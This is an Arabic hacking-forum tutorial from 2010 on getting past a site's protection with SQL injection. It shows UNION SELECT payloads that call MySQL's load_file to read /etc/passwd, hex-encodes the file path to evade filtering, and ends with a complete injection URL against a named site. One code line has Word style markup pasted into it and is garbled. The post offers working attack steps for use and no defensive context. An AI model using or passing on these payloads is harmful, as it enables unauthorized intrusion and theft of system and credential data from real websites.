ماندو عضو مميز
عدد المساهمات : 114 تاريخ التسجيل : 03/06/2010
| موضوع: شـرح تحطي حماية الموقع باستعمال الامر load_file للحصول علي اليوزر والباسورد الإثنين يونيو 14, 2010 4:31 pm | |
| كان احد سألني عن امر load_file
واذا كان يريد يشفرو ا لان الموقع محمي
قلت بشرحة هنا لكي يستفيد الجميع
اول شئ بعد اكتشاف العمود المصاب
راح نروح مكان العمود المصاب
ونضع الامر تحميل الملف كود: load_file مثلا
عندنا موقع مصاب ورقم العمود المصاب 5
نضع الامر مكان العمود 5
لاحضار اليوزر نيم + الباسورد
كود: load_file('/etc/passwd') كود: id=-33 union select 1,2,3,4, <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; text-align:right; mso-pagination:widow-orphan; direction:rtl; unicode-bidi:embed; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman";} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;} div.Section1 {page:Section1;} --> load_file('/etc/passwd') ,6,7,8,9 from user اوك لاقينا الموقع محمي والحماية on
نروح نشفروا
نروح علي موقع
انا اختارت الموقع دا
اضغط هنا
نضع
كود: etc/passwd ونشفر كود: encode now اوك طلع لنا الامر مشفر MySql hex-encoded stringوهذا الامر كود: 0x6574632f706173737764 كود: load_file(0x6574632f706173737764) زي ما واضح بالصورة ونطبق
نلقي النتيجة تمامـ
مثال كود: http://dev-chat.com/vb/newthread.php?id=-33 union select 1,2,3,4,load_file(0x6574632f706173737764),6,7,8,9 from user-- | |
|